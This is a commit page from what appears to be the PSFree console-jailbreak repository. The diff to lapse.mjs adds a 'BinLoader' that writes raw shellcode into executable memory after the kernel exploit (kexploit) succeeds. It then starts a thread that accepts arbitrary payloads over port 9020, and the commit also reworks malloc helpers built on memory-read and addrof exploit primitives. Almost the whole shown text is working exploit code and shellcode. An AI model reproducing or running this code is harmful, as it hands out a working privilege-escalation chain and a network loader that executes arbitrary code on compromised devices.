Seth/PSFree
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

add binloader + malloc fix

Browse Source
This commit is contained in:
Nazky
2025-05-29 14:48:47 +02:00
parent 73a525517d
commit f87aa8cd13
3 changed files with 315 additions and 22 deletions
Download Patch File Download Diff File Expand all files Collapse all files
lapse.mjs
+67 -17
View File
@@ -1659,11 +1659,17 @@ export async function kexploit() {
await init();
const _init_t2 = performance.now();
if(sessionStorage.getItem('binloader')){
runBinLoader();
return new Promise(() => {});
}
// If setuid is successful, we dont need to run the kexploit again
try {
if (sysi('setuid', 0) == 0) {
log("Not running kexploit again.")
return;
log("Not running kexploit again.");
runBinLoader();
return new Promise(() => {});
}
}
catch (e) {}
@@ -1743,6 +1749,49 @@ export async function kexploit() {
}
}
function runBinLoader() {
/* BinLoader by ps3120 */
var payload_buffer = chain.sysp('mmap', 0x0, 0x300000, 0x7, 0x1000, 0xFFFFFFFF, 0);
var payload_loader = malloc32(0x1000);
var BLDR = payload_loader.backing;
BLDR[0] = 0x56415741; BLDR[1] = 0x83485541; BLDR[2] = 0x894818EC;
BLDR[3] = 0xC748243C; BLDR[4] = 0x10082444; BLDR[5] = 0x483C2302;
BLDR[6] = 0x102444C7; BLDR[7] = 0x00000000; BLDR[8] = 0x000002BF;
BLDR[9] = 0x0001BE00; BLDR[10] = 0xD2310000; BLDR[11] = 0x00009CE8;
BLDR[12] = 0xC7894100; BLDR[13] = 0x8D48C789; BLDR[14] = 0xBA082474;
BLDR[15] = 0x00000010; BLDR[16] = 0x000095E8; BLDR[17] = 0xFF894400;
BLDR[18] = 0x000001BE; BLDR[19] = 0x0095E800; BLDR[20] = 0x89440000;
BLDR[21] = 0x31F631FF; BLDR[22] = 0x0062E8D2; BLDR[23] = 0x89410000;
BLDR[24] = 0x2C8B4CC6; BLDR[25] = 0x45C64124; BLDR[26] = 0x05EBC300;
BLDR[27] = 0x01499848; BLDR[28] = 0xF78944C5; BLDR[29] = 0xBAEE894C;
BLDR[30] = 0x00001000; BLDR[31] = 0x000025E8; BLDR[32] = 0x7FC08500;
BLDR[33] = 0xFF8944E7; BLDR[34] = 0x000026E8; BLDR[35] = 0xF7894400;
BLDR[36] = 0x00001EE8; BLDR[37] = 0x2414FF00; BLDR[38] = 0x18C48348;
BLDR[39] = 0x5E415D41; BLDR[40] = 0x31485F41; BLDR[41] = 0xC748C3C0;
BLDR[42] = 0x000003C0; BLDR[43] = 0xCA894900; BLDR[44] = 0x48C3050F;
BLDR[45] = 0x0006C0C7; BLDR[46] = 0x89490000; BLDR[47] = 0xC3050FCA;
BLDR[48] = 0x1EC0C748; BLDR[49] = 0x49000000; BLDR[50] = 0x050FCA89;
BLDR[51] = 0xC0C748C3; BLDR[52] = 0x00000061; BLDR[53] = 0x0FCA8949;
BLDR[54] = 0xC748C305; BLDR[55] = 0x000068C0; BLDR[56] = 0xCA894900;
BLDR[57] = 0x48C3050F; BLDR[58] = 0x006AC0C7; BLDR[59] = 0x89490000;
BLDR[60] = 0xC3050FCA;
chain.sys('mprotect', payload_loader, 0x4000, (0x1 | 0x2 | 0x4));
var pthread = malloc(0x10);
sysi('mlock', payload_buffer, 0x300000);
call_nze(
'pthread_create',
pthread,
0,
payload_loader,
payload_buffer
);
log('BinLoader is ready. Send a payload to port 9020 now');
}
//For some reason this payload loader version does KP.
/*kexploit().then(() => {
var payload_buffer = chain.sysp('mmap', new Int(0x26200000, 0x9), 0x300000, PROT_READ | PROT_WRITE | PROT_EXEC, 0x41000, -1, 0);
@@ -1762,22 +1811,23 @@ export async function kexploit() {
})*/
kexploit().then(() => {
function malloc(sz) {
var backing = new Uint8Array(0x10000 + sz);
nogc.push(backing);
var ptr = mem.readp(mem.addrof(backing).add(0x10));
ptr.backing = backing;
return ptr;
}
function malloc(sz) {
var backing = new Uint8Array(0x10000 + sz);
nogc.push(backing);
var ptr = mem.readp(mem.addrof(backing).add(0x10));
ptr.backing = backing;
return ptr;
}
function malloc32(sz) {
var backing = new Uint8Array(0x10000 + sz * 4);
nogc.push(backing);
var ptr = mem.readp(mem.addrof(backing).add(0x10));
ptr.backing = new Uint32Array(backing.buffer);
return ptr;
}
function malloc32(sz) {
var backing = new Uint8Array(0x10000 + sz * 4);
nogc.push(backing);
var ptr = mem.readp(mem.addrof(backing).add(0x10));
ptr.backing = new Uint32Array(backing.buffer);
return ptr;
}
kexploit().then(() => {
window.pld_size = new Int(0x26200000, 0x9);
var payload_buffer = chain.sysp('mmap', window.pld_size, 0x300000, 7, 0x41000, -1, 0);